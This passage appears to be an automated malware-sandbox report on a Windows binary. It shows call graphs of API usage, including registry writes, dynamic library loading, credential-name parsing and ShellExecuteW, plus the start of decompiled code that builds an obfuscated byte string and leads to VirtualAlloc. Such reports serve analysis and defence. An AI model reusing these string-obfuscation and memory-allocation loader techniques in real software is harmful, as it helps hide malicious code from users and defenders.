calls 6591->6593 6594 401c1d 6592->6594 6596 401880 88 API calls 6592->6596 6597 401bcb 6593->6597 6595 401930 13 API calls 6594->6595 6598 401c28 6595->6598 6596->6594 6597->6592 6599 4019f0 97 API calls 6597->6599 6598->6568 6600 401be3 6599->6600 6600->6592 6601 401bec 6600->6601 6601->6598 6602 401bf2 MessageBoxW 6601->6602 6602->6568 6604 4019e3 6603->6604 6605 4019cf MessageBoxW 6603->6605 6604->6568 6605->6604 6607 402a23 _memset 6606->6607 6608 402a3b SHGetMalloc 6607->6608 6609 402a53 SHGetDesktopFolder 6608->6609 6614 402a8e ___ansicp 6608->6614 6610 402a68 SearchPathW 6609->6610 6609->6614 6611 402a84 GetLastError 6610->6611 6612 402aa6 6610->6612 6611->6614 6613 402ae3 CoInitialize 6612->6613 6612->6614 6613->6614 6615 402af4 CoCreateInstance 6613->6615 6614->6532 6616 402c2d CoUninitialize 6615->6616 6617 402b16 6615->6617 6616->6614 6617->6616 6618 402bbf #217 6617->6618 6620 402bde 6617->6620 6619 402bec #173 6618->6619 6618->6620 6619->6616 6619->6620 6620->6616 6622 4018d9 6621->6622 6623 40189f FormatMessageW 6621->6623 6625 4032bd _swprintf 85 API calls 6622->6625 6624 4032bd _swprintf 85 API calls 6623->6624 6626 4018d4 MessageBoxW LocalFree 6624->6626 6625->6626 6628 40191d ___ansicp 6626->6628 6628->6568 6630 409280 _memset 6629->6630 6631 402fab GetShortPathNameW 6630->6631 6633 402fd0 GetModuleFileNameW GetShortPathNameW 6631->6633 6634 40304b LocalAlloc 6633->6634 6636 403080 6634->6636 6637 403065 ___ansicp 6634->6637 6638 403926 72 API calls 6636->6638 6637->6557 6639 403094 6638->6639 6640 4030a1 6639->6640 6641 4030b6 6639->6641 6642 4036e5 _wcscpy_s 5 API calls 6640->6642 6643 4030ad 6641->6643 6645 4036e5 _wcscpy_s 5 API calls 6641->6645 6642->6643 6644 40366b _wcscat_s 5 API calls 6643->6644 6646 4030f3 6644->6646 6645->6643 6647 40366b _wcscat_s 5 API calls 6646->6647 6651 4030ff 6647->6651 6648 403135 6649 403148 ___ansicp 6648->6649 6650 40366b _wcscat_s 5 API calls 6648->6650 6649->6557 6650->6649 6651->6648 6652 40366b 5 API calls _wcscat_s 6651->6652 6652->6651 6654 402cba _memset 6653->6654 6655 4036e5 _wcscpy_s 5 API calls 6654->6655 6656 402d66 6655->6656 6657 40366b _wcscat_s 5 API calls 6656->6657 6658 402d79 LoadLibraryW GetProcAddress 6657->6658 6660 402dc7 6658->6660 6661 402e49 LoadLibraryW GetProcAddress 6658->6661 6662 402df3 LoadLibraryW GetProcAddress 6660->6662 6669 402f14 6660->6669 6666 402eb8 _wcschr 6661->6666 6664 402e36 6662->6664 6663 402f3b ___ansicp 6663->6557 6667 402ef4 6664->6667 6668 402e3e GetLastError 6664->6668 6665 402f34 CoTaskMemFree 6665->6663 6666->6667 6666->6669 6671 4036e5 _wcscpy_s 5 API calls 6666->6671 6667->6669 6670 402ef9 CredUIParseUserNameW 6667->6670 6668->6669 6669->6663 6669->6665 6670->6669 6672 402ee5 GetComputerNameW 6671->6672 6672->6667 6925 4038f3 6673->6925 6687 403227 6676->6687 6679 4014e2 6681 4017a7 RegSetValueExW 6679->6681 6682 4014ef LocalAlloc LoadLibraryW 6679->6682 6680 4014bb RegQueryValueExW 6680->6679 6683 4017c4 RegCloseKey 6681->6683 6685 401541 6682->6685 6684 4017ea ___ansicp 6683->6684 6684->6571 6685->6685 6686 40176f DialogBoxIndirectParamW LocalFree 6685->6686 6686->6681 6686->6683 6688 403252 6687->6688 6689 403235 6687->6689 6688->6689 6690 403259 6688->6690 6692 4057fc _wcscat_s 5 API calls 6689->6692 6698 404de6 6690->6698 6696 40149f RegCreateKeyW 6692->6696 6693 40327f 6694 403289 6693->6694 6712 404c86 6693->6712 6694->6696 6697 404c86 __flsbuf 85 API calls 6694->6697 6696->6679 6696->6680 6697->6696 6699 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6698->6699 6707 404e41 __aulldvrm __woutput_l _strlen 6699->6707 6700 404e46 6701 4057fc _wcscat_s 5 API calls 6700->6701 6702 404e5b ___ansicp 6701->6702 6702->6693 6703 403199 _realloc 2 API calls 6703->6707 6704 406443 5 API calls ___crtInitCritSecAndSpinCount 6704->6707 6705 409344 87 API calls _write_string 6705->6707 6707->6700 6707->6702 6707->6703 6707->6704 6707->6705 6708 407c47 __malloc_crt 28 API calls 6707->6708 6709 40906b 54 API calls __woutput_l 6707->6709 6710 4092fa 87 API calls __woutput_l 6707->6710 6711 40931f 87 API calls _write_multi_char 6707->6711 6727 409195 6707->6727 6708->6707 6709->6707 6710->6707 6711->6707 6730 408d9c 6712->6730 6714 404db5 6716 408a7d __locking 80 API calls 6714->6716 6715 404d35 6717 404d4c 6715->6717 6722 404d69 6715->6722 6720 404c9f 6716->6720 6744 408a7d 6717->6744 6718 404c94 __flswbuf 6718->6720 6723 404d1c 6718->6723 6726 404d27 6718->6726 6735 408b9d 6718->6735 6720->6694 6722->6720 6763 40839e 6722->6763 6723->6726 6741 408b59 6723->6741 6726->6714 6726->6715 6728 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6727->6728 6729 4091a6 6728->6729 6729->6707 6731 408dc4 6730->6731 6732 408da7 6730->6732 6731->6718 6733 4057fc _wcscat_s 5 API calls 6732->6733 6734 408dbc 6733->6734 6734->6718 6736 408ba6 6735->6736 6738 408bb4 6735->6738 6736->6723 6737 408bdf 6737->6723 6738->6737 6739 4057fc _wcscat_s 5 API calls 6738->6739 6740 408bd8 6739->6740 6740->6723 6742 407c47 __malloc_crt 28 API calls 6741->6742 6743 408b69 6742->6743 6743->6726 6745 408a89 _realloc 6744->6745 6746 408a91 6745->6746 6747 408aac 6745->6747 6787 403cfc 6746->6787 6749 408aba 6747->6749 6751 408afb 6747->6751 6750 403cfc __locking VirtualAlloc 6749->6750 6752 408abf 6750->6752 6791 40ba91 6751->6791 6757 4057fc _wcscat_s 5 API calls 6752->6757 6754 408b01 6755 408b24 6754->6755 6756 408b0e 6754->6756 6760 403cfc __locking VirtualAlloc 6755->6760 6797 4084b7 6756->6797 6758 408a96 _realloc 6757->6758 6758->6720 6761 408b1c 6760->6761 6843 408b4f 6761->6843 6764 4083aa _realloc 6763->6764 6765 4083d7 6764->6765 6766 4083bb 6764->6766 6767 4083e5 6765->6767 6769 408406 6765->6769 6768 403cfc __locking VirtualAlloc 6766->6768 6770 403cfc __locking VirtualAlloc 6767->6770 6771 4083c0 _realloc 6768->6771 6773 408426 6769->6773 6774 40844c 6769->6774 6772 4083ea 6770->6772 6771->6720 6779 4057fc _wcscat_s 5 API calls 6772->6779 6776 403cfc __locking VirtualAlloc 6773->6776 6775 40ba91 __locking 17 API calls 6774->6775 6777 408452 6775->6777 6782 40842b 6776->6782 6778 40845f 6777->6778 6781 40847b 6777->6781 6780 40831b __lseeki64_nolock 9 API calls 6778->6780 6779->6771 6783 408470 6780->6783 6785 403cfc __locking VirtualAlloc 6781->6785 6784 4057fc _wcscat_s 5 API calls 6782->6784 6872 4084ad 6783->6872 6784->6771 6785->6783 6788 403d68 __locking 6787->6788 6789 403e0c VirtualAlloc 6788->6789 6790 403e29 __locking 6789->6790 6790->6758 6794 40ba9d _realloc 6791->6794 6792 40bb1a _realloc 6792->6754 6793 40bafd EnterCriticalSection 6793->6792 6795 407b82 ___crtInitCritSecAndSpinCount 16 API calls 6794->6795 6796 40bae0 __locking 6794->6796 6795->6796 6796->6792 6796->6793 6798 4084f3 6797->6798 6820 4084ec ___ansicp 6797->6820 6799 4084f7 6798->6799 6800 40851e 6798->6800 6801 403cfc __locking VirtualAlloc 6799->6801 6802 408562 6800->6802 6804 408588 6800->6804 6805 4084fc 6801->6805 6806 403cfc __locking VirtualAlloc 6802->6806 6803 40859a 6808 408b9d __flswbuf 5 API calls 6803->6808 6804->6803 6846 40831b 6804->6846 6810 4057fc _wcscat_s 5 API calls 6805->6810 6809 408567 6806->6809 6811 4085a3 6808->6811 6813 4057fc _wcscat_s 5 API calls 6809->6813 6810->6820 6812 4087a2 6811->6812 6818 40665f __setmbcp 44 API calls 6811->6818 6814 4087b0 6812->6814 6815 4089d5 WriteFile 6812->6815 6813->6820 6816 408853 6814->6816 6824 4087c2 6814->6824 6817 4089fc GetLastError 6815->6817 6823 40879d 6815->6823 6828 40885d 6816->6828 6834 4088fa 6816->6834 6817->6823 6819 4085be GetConsoleMode 6818->6819 6819->6812 6821 4085e2 6819->6821 6820->6761 6821->6812 6822 4085f0 GetConsoleCP 6821->6822 6822->6823 6838 408610 6822->6838 6823->6820 6829 408a2b 6823->6829 6830 408a1e 6823->6830 6824->6823 6825 40880d WriteFile 6824->6825 6824->6830 6825->6817 6825->6824 6826 408950 WideCharToMultiByte 6826->6817 6831 408983 WriteFile 6826->6831 6827 4088b0 WriteFile 6827->6817 6827->6828 6828->6823 6828->6827 6828->6830 6857 403d0f 6829->6857 6830->6820 6832 403cfc __locking VirtualAlloc 6830->6832 6833 4089b1 GetLastError 6831->6833 6831->6834 6832->6820 6833->6834 6834->6823 6834->6826 6834->6830 6834->6831 6837 40917e 54 API calls __write_nolock 6837->6838 6838->6817 6838->6823 6838->6837 6839 408688 WideCharToMultiByte 6838->6839 6840 40bb53 6 API calls __putwch_nolock 6838->6840 6842 4086ef WriteFile 6838->6842 6854 4091cb 6838->6854 6839->6823 6841 4086b6 WriteFile 6839->6841 6840->6838 6841->6817 6841->6838 6842->6817 6842->6838 6871 40bb31 LeaveCriticalSection 6843->6871 6845 408b57 6845->6758 6861 40ba20 6846->6861 6848 408337 6849 408350 SetFilePointer 6848->6849 6853 40833f 6848->6853 6850 408368 GetLastError 6849->6850 6849->6853 6851 408372 6850->6851 6850->6853 6852 403d0f __write_nolock VirtualAlloc 6851->6852 6852->6853 6853->6803 6855 409195 __isleadbyte_l 54 API calls 6854->6855 6856 4091d6 6855->6856 6856->6838 6858 403d68 __locking 6857->6858 6859 403e0c VirtualAlloc 6858->6859 6860 403e29 __locking 6859->6860 6860->6820 6862 40ba40 6861->6862 6863 40ba29 6861->6863 6865 403cfc __locking VirtualAlloc 6862->6865 6867 40ba8d 6862->6867 6864 403cfc __locking VirtualAlloc 6863->6864 6866 40ba2e 6864->6866 6868 40ba6e 6865->6868 6866->6848 6867->6848 6869 4057fc _wcscat_s 5 API calls 6868->6869 6870 40ba85 6869->6870 6870->6848 6871->6845 6875 40bb31 LeaveCriticalSection 6872->6875 6874 4084b5 6874->6771 6875->6874 6877 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6876->6877 6878 40336e 6877->6878 6879 4033a6 6878->6879 6880 403377 6878->6880 6881 4033ae 6879->6881 6886 4033dd 6879->6886 6882 4057fc _wcscat_s 5 API calls 6880->6882 6884 4057fc _wcscat_s 5 API calls 6881->6884 6883 40338c 6882->6883 6883->6580 6884->6883 6885 40691c 79 API calls __towlower_l 6885->6886 6886->6883 6886->6885 6888 401b82 ___ansicp 6887->6888 6889 401a36 RegCreateKeyExW 6887->6889 6888->6591 6890 401b78 RegCloseKey 6889->6890 6891 401a5b RegCreateKeyExW 6889->6891 6890->6888 6892 401b71 RegCloseKey 6891->6892 6893 401a82 RegCreateKeyExW 6891->6893 6892->6890 6895 401ab3 RegCreateKeyExW 6893->6895 6896 401b6a RegCloseKey 6893->6896 6897 401b63 RegCloseKey 6895->6897 6898 401ad5 GetModuleFileNameW 6895->6898 6896->6892 6897->6896 6899 401aea 6898->6899 6903 4032bd 6899->6903 6906 405916 6903->6906 6907 405921 6906->6907 6908 40593e 6906->6908 6909 4057fc _wcscat_s 5 API calls 6907->6909 6911 40594b 6908->6911 6914 405820 6908->6914 6913 401b1f RegSetValueW RegCloseKey 6909->6913 6912 4057fc _wcscat_s 5 API calls 6911->6912 6911->6913 6912->6913 6913->6897 6915 40584e 6914->6915 6916 40582e 6914->6916 6917 40585e 6915->6917 6921 40587e 6915->6921 6918 4057fc _wcscat_s 5 API calls 6916->6918 6919 4057fc _wcscat_s 5 API calls 6917->6919 6920 405843 6918->6920 6919->6920 6920->6911 6921->6920 6922 4058c5 6921->6922 6923 404c86 __flsbuf 85 API calls 6921->6923 6922->6920 6924 404c86 __flsbuf 85 API calls 6922->6924 6923->6922 6924->6920 6926 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6925->6926 6927 403905 6926->6927 6930 40376c 6927->6930 6929 403914 6929->6557 6931 4037a2 _wcsnlen 6930->6931 6935 403784 6930->6935 6931->6935 6937 403798 ___ansicp 6931->6937 6945 40714b 6931->6945 6932 4057fc _wcscat_s 5 API calls 6932->6937 6935->6932 6936 403839 6939 40354a _malloc 27 API calls 6936->6939 6941 403854 __crtLCMapStringA_stat 6936->6941 6937->6929 6938 40714b ___crtGetStringTypeA 72 API calls 6940 4038b1 6938->6940 6939->6941 6942 4036e5 _wcscpy_s 5 API calls 6940->6942 6943 4038c4 6940->6943 6941->6937 6941->6938 6942->6943 6944 403751 __freea 2 API calls 6943->6944 6944->6937 6946 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6945->6946 6947 40715c 6946->6947 6950 406eea 6947->6950 6949 403802 6949->6935 6949->6936 6949->6937 6951 406f0f LCMapStringW 6950->6951 6955 406f24 6950->6955 6952 406f30 GetLastError 6951->6952 6951->6955 6952->6955 6953 406f71 LCMapStringW 6954 406fe5 ___ansicp 6953->6954 6954->6949 6955->6953 6956 406f8a 6955->6956 6956->6954 6957 40b123 ___ansicp 65 API calls 6956->6957 6958 406fb8 WideCharToMultiByte 6957->6958 6958->6954 6960 406fec 6958->6960 6962 40354a _malloc 27 API calls 6960->6962 6966 407004 __crtLCMapStringA_stat 6960->6966 6961 407038 WideCharToMultiByte 6963 407052 LCMapStringA 6961->6963 6964 40712c 6961->6964 6962->6966 6963->6964 6968 407070 6963->6968 6965 403751 __freea 2 API calls 6964->6965 6965->6954 6966->6954 6966->6961 6967 4070b5 LCMapStringA 6970 407100 6967->6970 6973 4070c9 6967->6973 6971 407088 __crtLCMapStringA_stat 6968->6971 6972 40354a _malloc 27 API calls 6968->6972 6969 403751 __freea 2 API calls 6969->6964 6970->6969 6971->6964 6971->6967 6972->6971 6973->6970 6974 40a5a6 __crtLCMapStringW_stat 5 API calls 6973->6974 6975 4070ef 6974->6975 6975->6970 6976 405700 __invoke_watson 5 API calls 6975->6976 6976->6970 6978 402016 6977->6978 6979 402038 6977->6979 6978->6979 6980 402022 ShowWindow 6978->6980 6983 406b83 _realloc 6982->6983 6984 406443 ___crtInitCritSecAndSpinCount 5 API calls 6983->6984 6988 406bf9 _abort 6983->6988 6985 406bb9 6984->6985 6987 406443 ___crtInitCritSecAndSpinCount 5 API calls 6985->6987 6986 406c41 _realloc 6986->5814 6990 406bc7 6987->6990 6988->6986 6989 406a13 _malloc 3 API calls 6988->6989 6989->6986 6990->6988 6991 40643a __init_pointers 9 API calls 6990->6991 6992 406443 ___crtInitCritSecAndSpinCount 5 API calls 6990->6992 6991->6990 6992->6990 7095 403b61 7096 403b70 7095->7096 7097 403b76 7095->7097 7098 406c6a _abort 12 API calls 7096->7098 7101 406c8a 7097->7101 7098->7097 7100 403b7b _realloc 7102 406b77 _abort 12 API calls 7101->7102 7103 406c95 7102->7103 7103->7100 7144 408c01 7145 408c0e 7144->7145 7146 407c87 __calloc_crt 7 API calls 7145->7146 7147 408c28 7146->7147 7148 407c87 __calloc_crt 7 API calls 7147->7148 7149 408c41 7147->7149 7148->7149 7186 40c125 7187 4069c9 __amsg_exit 23 API calls 7186->7187 7188 40c12c 7187->7188 7104 40b868 RtlUnwind 6993 407acc 6994 407afc GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6993->6994 6995 407aef 6993->6995 6996 407af3 6994->6996 6995->6994 6995->6996 6997 403b4d 7000 407228 6997->7000 7001 4065e8 _raise 26 API calls 7000->7001 7002 403b5e 7001->7002 7003 401d50 7004 401d84 7003->7004 7005 401f3b 7003->7005 7006 401ecb 7004->7006 7012 401d8a 7004->7012 7007 401f42 7005->7007 7008 401f7d ChildWindowFromPoint 7005->7008 7009 401ed7 SetBkMode GetSysColorBrush 7006->7009 7010 401fda DefWindowProcW 7006->7010 7007->7010 7013 401f4b ChildWindowFromPoint 7007->7013 7014 401fc1 SetCursor 7008->7014 7015 401fa4 InvalidateRect 7008->7015 7016 401ef9 7009->7016 7017 401eee GetSysColor 7009->7017 7018 401ff8 ___ansicp 7010->7018 7011 401dae EndDialog PostQuitMessage 7011->7010 7012->7011 7019 401dc4 6 API calls 7012->7019 7020 401d96 7012->7020 7013->7010 7021 401f64 ShellExecuteW 7013->7021 7014->7010 7015->7014 7023 401efe SetTextColor 7016->7023 7017->7023 7024 40354a _malloc 27 API calls 7019->7024 7020->7010 7020->7011 7021->7010 7025 401f13 7023->7025 7026 401f18 SelectObject GetSysColorBrush 7023->7026 7027 401e38 GetFileVersionInfoW 7024->7027 7025->7026 7028 401f35 ___ansicp 7026->7028 7034 401d00 VerQueryValueW 7027->7034 7031 401d00 87 API calls 7032 401e71 SetDlgItemTextW GetModuleHandleW LoadCursorW LoadCursorW ShowWindow 7031->7032 7033 401ec5 ___ansicp 7032->7033 7037 401c30 7034->7037 7036 401d3f SetDlgItemTextW 7036->7031 7038 4032bd _swprintf 85 API calls 7037->7038 7039 401ca1 VerQueryValueW 7038->7039 7040 401cc7 ___ansicp 7039->7040 7040->7036 7105 404af0 7106 404b1b __except_handler4 ___ansicp 7105->7106 7107 404b94 __except_handler4 ___ansicp 7106->7107 7110 4081aa RtlUnwind 7106->7110 7109 404c14 __except_handler4 @_EH4_CallFilterFunc@8 ___ansicp 7110->7109 7150 401310 7151 401343 7150->7151 7152 4013be 7150->7152 7154 401348 7151->7154 7155 40136a 7151->7155 7178 401220 7152->7178 7157 40134d GetDlgItem 7154->7157 7168 401383 ___ansicp 7154->7168 7158 4013b0 EndDialog 7155->7158 7159 401377 7155->7159 7161 40135d GetSysColorBrush 7157->7161 7157->7168 7158->7168 7162 4013a2 EndDialog 7159->7162 7163 40137c 7159->7163 7160 403227 __swprintf 87 API calls 7164 4013f2 SetWindowTextW GetDlgItem SendMessageW GetDlgItem SendMessageW 7160->7164 7161->7168 7162->7168 7165 40138a GetDlgItem 7163->7165 7163->7168 7167 403199 _realloc 2 API calls 7164->7167 7169 401000 7165->7169 7167->7168 7170 409280 _memset 7169->7170 7171 40101c GetModuleHandleW PrintDlgW 7170->7171 7172 401054 6 API calls 7171->7172 7173 40104e 7171->7173 7174 409280 _memset 7172->7174 7173->7168 7175 4010b8 7 API calls 7174->7175 7176 4011b5 StartPage SendMessageW EndPage 7175->7176 7177 4011ee SendMessageW EndDoc SetCursor 7175->7177 7176->7176 7176->7177 7177->7168 7179 401234 7178->7179 7180 40354a _malloc 27 API calls 7179->7180 7181 401258 7180->7181 7181->7160 7189 4064b1 TlsAlloc 7111 407b72 InitializeCriticalSection 7190 408cb2 7197 40be32 7190->7197 7193 408cc5 7194 403199 _realloc 2 API calls 7193->7194 7196 408cd0 7194->7196 7206 40bd58 7197->7206 7199 408cb7 7199->7193 7200 40bc15 7199->7200 7201 40bc21 _realloc 7200->7201 7202 40bc96 __fcloseall _realloc 7201->7202 7203 40bc6b DeleteCriticalSection 7201->7203 7221 40c798 7201->7221 7202->7193 7205 403199 _realloc 2 API calls 7203->7205 7205->7201 7211 40bd64 _realloc 7206->7211 7208 40be0b _flsall _realloc 7208->7199 7210 40bd16 84 API calls _flsall 7210->7211 7211->7208 7211->7210 7212 408d0e 7211->7212 7215 40bdfa 7211->7215 7213 408d17 _realloc 7212->7213 7214 408d2d EnterCriticalSection 7212->7214 7213->7211 7214->7211 7218 408d72 7215->7218 7217 40be08 7217->7211 7219 408d91 LeaveCriticalSection 7218->7219 7220 408d7f 7218->7220 7219->7217 7220->7217 7222 40c7a4 _realloc 7221->7222 7223 40c7d5 7222->7223 7224 40c7b8 7222->7224 7229 40c7cd _realloc 7223->7229 7232 408cd2 7223->7232 7227 4057fc _wcscat_s 5 API calls 7224->7227 7226 40c7ed 7236 40c726 7226->7236 7227->7229 7229->7201 7233 408ce0 7232->7233 7234 408d02 EnterCriticalSection 7232->7234 7233->7234 7235 408ce8 _realloc 7233->7235 7234->7226 7235->7226 7237 40c752 7236->7237 7238 40c736 7236->7238 7239 40c74b 7237->7239 7253 40bcb4 7237->7253 7241 4057fc _wcscat_s 5 API calls 7238->7241 7250 40c80c 7239->7250 7241->7239 7245 408d9c __flush 5 API calls 7246 40c76c 7245->7246 7263 40ccfb 7246->7263 7248 40c772 7248->7239 7249 403199 _realloc 2 API calls 7248->7249 7249->7239 7305 408d3c 7250->7305 7252 40c812 7252->7229 7254 40bcc9 7253->7254 7258 40bcea 7253->7258 7255 408d9c __flush 5 API calls 7254->7255 7254->7258 7256 40bce3 7255->7256 7257 408a7d __locking 80 API calls 7256->7257 7257->7258 7259 40cdc8 7258->7259 7260 40c766 7259->7260 7261 40cdd4 7259->7261 7260->7245 7261->7260 7262 403199 _realloc 2 API calls 7261->7262 7262->7260 7264 40cd07 _realloc 7263->7264 7265 40cd2a 7264->7265 7266 40cd0f 7264->7266 7268 40cd38 7265->7268 7270 40cd79 7265->7270 7267 403cfc __locking VirtualAlloc 7266->7267 7276 40cd14 _realloc 7267->7276 7269 403cfc __locking VirtualAlloc 7268->7269 7271 40cd3d 7269->7271 7272 40ba91 __locking 17 API calls 7270->7272 7274 4057fc _wcscat_s 5 API calls 7271->7274 7273 40cd7f 7272->7273 7277 40cd94 7273->7277 7279 40cc67 7273->7279 7274->7276 7276->7248 7294 40cdbe 7277->7294 7280 40ba20 __lseeki64_nolock 6 API calls 7279->7280 7283 40cc73 7280->7283 7281 40ccc6 7297 40b99f 7281->7297 7283->7281 7284 40cca4 7283->7284 7286 40ba20 __lseeki64_nolock 6 API calls 7283->7286 7284->7281 7287 40ba20 __lseeki64_nolock 6 API calls 7284->7287 7290 40cc9b 7286->7290 7288 40ccb0 CloseHandle 7287->7288 7288->7281 7291 40ccbc GetLastError 7288->7291 7289 40ccf0 7289->7277 7293 40ba20 __lseeki64_nolock 6 API calls 7290->7293 7291->7281 7292 403d0f __write_nolock VirtualAlloc 7292->7289 7293->7284 7304 40bb31 LeaveCriticalSection 7294->7304 7296 40cdc6 7296->7276 7298 40ba07 7297->7298 7299 40b9ac 7297->7299 7300 403cfc __locking VirtualAlloc 7298->7300 7299->7298 7301 40b9d7 7299->7301 7302 40b9fd 7300->7302 7301->7302 7303 40b9f7 SetStdHandle 7301->7303 7302->7289 7302->7292 7303->7302 7304->7296 7306 408d67 LeaveCriticalSection 7305->7306 7307 408d49 7305->7307 7306->7252 7307->7306 7308 408d50 7307->7308 7308->7252 7112 406677 7113 406683 _realloc 7112->7113 7114 40669b 7113->7114 7115 403199 _realloc 2 API calls 7113->7115 7117 406777 _realloc 7113->7117 7116 4066a9 7114->7116 7118 403199 _realloc 2 API calls 7114->7118 7115->7114 7119 4066b7 7116->7119 7121 403199 _realloc 2 API calls 7116->7121 7118->7116 7120 4066c5 7119->7120 7122 403199 _realloc 2 API calls 7119->7122 7123 4066d3 7120->7123 7124 403199 _realloc 2 API calls 7120->7124 7121->7119 7122->7120 7125 403199 _realloc 2 API calls 7123->7125 7127 4066e1 7123->7127 7124->7123 7125->7127 7126 4066f2 _realloc 7129 406706 InterlockedDecrement 7126->7129 7132 40671f _realloc __freefls@4 7126->7132 7127->7126 7128 403199 _realloc 2 API calls 7127->7128 7128->7126 7130 406711 7129->7130 7129->7132 7131 403199 _realloc 2 API calls 7130->7131 7130->7132 7131->7132 7133 406764 __freefls@4 7132->7133 7134 406220 ___removelocaleref 8 API calls 7132->7134 7135 403199 _realloc 2 API calls 7133->7135 7136 406748 7134->7136 7135->7117 7136->7133 7137 40605a ___freetlocinfo 2 API calls 7136->7137 7137->7133 7138 40c6f9 7139 40c712 7138->7139 7140 40c70a 7138->7140 7142 40c724 7139->7142 7143 40c721 CloseHandle 7139->7143 7140->7139 7141 40c70f CloseHandle 7140->7141 7141->7139 7143->7142 7182 407219 SetUnhandledExceptionFilter 7309 40ac3b 7310 407c87 __calloc_crt 7 API calls 7309->7310 7311 40ac45 7310->7311 7312 4063cc ___crtInitCritSecAndSpinCount 9 API calls 7311->7312 7313 40ac4d 7312->7313 7041 40acdc 7042 40acdf 7041->7042 7045 40c52a 7042->7045 7046 40c556 7045->7046 7047 40c54f 7045->7047 7057 40ad4f 7046->7057 7049 406ce5 __amsg_exit 23 API calls 7047->7049 7049->7046 7051 40c567 _memset 7053 40c615 7051->7053 7055 40c5ea SetUnhandledExceptionFilter UnhandledExceptionFilter 7051->7055 7075 406c6a 7053->7075 7055->7053 7058 406443 ___crtInitCritSecAndSpinCount 5 API calls 7057->7058 7059 40ad5a 7058->7059 7059->7051 7060 40ad5c 7059->7060 7063 40ad68 _realloc 7060->7063 7061 40adc4 7062 40ada5 7061->7062 7066 40add3 7061->7066 7067 406443 ___crtInitCritSecAndSpinCount 5 API calls 7062->7067 7063->7061 7063->7062 7064 40ad8f 7063->7064 7068 40ad8b 7063->7068 7065 4065e8 _raise 26 API calls 7064->7065 7069 40ad94 _siglookup 7065->7069 7070 4057fc _wcscat_s 5 API calls 7066->7070 7067->7069 7068->7064 7068->7066 7071 406c6a _abort 12 API calls 7069->7071 7072 40ae3a _realloc 7069->7072 7074 40ad9d _raise _realloc 7069->7074 7070->7074 7071->7072 7073 40643a __init_pointers 9 API calls 7072->7073 7072->7074 7073->7074 7074->7051 7076 406b77 _abort 12 API calls 7075->7076 7077 406c77 7076->7077 7078 40395c 7079 403969 7078->7079 7080 406e85 __FF_MSGBANNER 23 API calls 7078->7080 7081 406ce5 __amsg_exit 23 API calls 7079->7081 7080->7079 7082 403972 7081->7082 7083 406a13 _malloc 3 API calls 7082->7083 7084 40397c 7083->7084 7085 4071dc 7086 407214 7085->7086 7087 4071ea 7085->7087 7087->7086 7089 40acb8 7087->7089 7090 40acc4 _realloc 7089->7090 7091 40665f __setmbcp 44 API calls 7090->7091 7093 40acc9 7091->7093 7092 40c52a _abort 49 API calls 7094 40aceb _realloc 7092->7094 7093->7092 7094->7086 7183 407c1f 7184 407c2b SetLastError 7183->7184 7185 407c33 _realloc 7183->7185 7184->7185

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 17 403cfc-403d66 18 403d71-403d75 17->18 19 403d77-403d89 18->19 20 403d8b-403d92 18->20 19->18 22 403d9d-403da1 20->22 23 403da3-403db5 22->23 24 403db7-403dbe 22->24 23->22 26 403dc9-403dcd 24->26 27 403de3-403e25 call 404187 call 4042a7 * 2 VirtualAlloc 26->27 28 403dcf-403de1 26->28 36 403e29-403e46 27->36 28->26 37 403e49-403e52 36->37 38 403e54-403e6d 37->38 39 403e6f-403e85 37->39 38->37 40 403e87-403e8e 39->40 41 403eba-403f35 call 4043b7 call 404497 39->41 40->36 42 403e90-403e99 40->42 46 403f3a-403f40 41->46 42->41 47 403f42-403f65 46->47 48 403f67 46->48 47->46 49 403f6e-403f74 48->49 50 403f76-403f9c 49->50 51 403f9e-403fc2 49->51 50->49 52 403ff2-403ffa 51->52 53 403fc4-403feb 51->53 53->52
                                                          C-Code - Quality: 68%
                                                          			E00403CFC(void* __eax, signed int __ebx, signed int __edi, void* __esi) {
                                                          				long _t166;
                                                          				intOrPtr* _t168;
                                                          				intOrPtr* _t169;
                                                          				signed int _t172;
                                                          				intOrPtr* _t175;
                                                          				signed int _t194;
                                                          				void* _t196;
                                                          				signed int _t216;
                                                          				signed int _t219;
                                                          				signed int _t223;
                                                          				signed char _t226;
                                                          				signed int _t227;
                                                          				intOrPtr _t233;
                                                          				signed int _t237;
                                                          				signed int _t253;
                                                          				signed int _t258;
                                                          				void* _t261;
                                                          				void* _t263;
                                                          				signed int _t264;
                                                          				void* _t265;
                                                          
                                                          				_t258 = __edi;
                                                          				_t223 = __ebx;
                                                          				 *((char*)(_t263 - 0x61)) = 0x23;
                                                          				 *((char*)(_t263 - 0x60)) = 0x51;
                                                          				 *((char*)(_t263 - 0x5f)) = 0x23;
                                                          				 *((char*)(_t263 - 0x5e)) = 0x4d;
                                                          				 *((char*)(_t263 - 0x5d)) = 0x23;
                                                          				_t264 = _t263 + 1;
                                                          				asm("movsb");
                                                          				_t261 = __esi + 1;
                                                          				 *((char*)(_t264 - 0x5b)) = 0x23;
                                                          				 *((char*)(_t264 - 0x5a)) = 0x4f;
                                                          				 *((char*)(_t264 - 0x59)) = 0x23;
                                                          				 *((char*)(_t264 - 0x58)) = 0x10;
                                                          				 *((char*)(_t264 - 0x57)) = 0x23;
                                                          				 *((char*)(_t264 - 0x56)) = 0x11;
                                                          				 *((char*)(_t264 - 0x55)) = 0x23;
                                                          				 *((char*)(_t264 - 0x54)) = 0xd;
                                                          				 *((char*)(_t264 - 0x53)) = 0x23;
                                                          				 *((char*)(_t264 - 0x52)) = 0x47;
                                                          				 *((char*)(_t264 - 0x51)) = 0x23;
                                                          				 *((char*)(_t264 - 0x50)) = 0x4f;
                                                          				 *((char*)(_t264 - 0x4f)) = 0x23;
                                                          				 *((char*)(_t264 - 0x4e)) = 0x4f;
                                                          				 *((char*)(_t264 - 0x4d)) = 0x23;
                                                          				 *((char*)(_t264 - 0x4c)) = 0x23;
                                                          				 *((char*)(_t264 - 0x4b)) = 0x23;
                                                          				 *(_t264 - 0x68) = 0;
                                                          				 *(_t264 - 0x68) = 0;
                                                          				while( *(_t264 - 0x68) < 0xd) {
                                                          					_t30 =  *(_t264 - 0x68) - 0x34; // 0x75
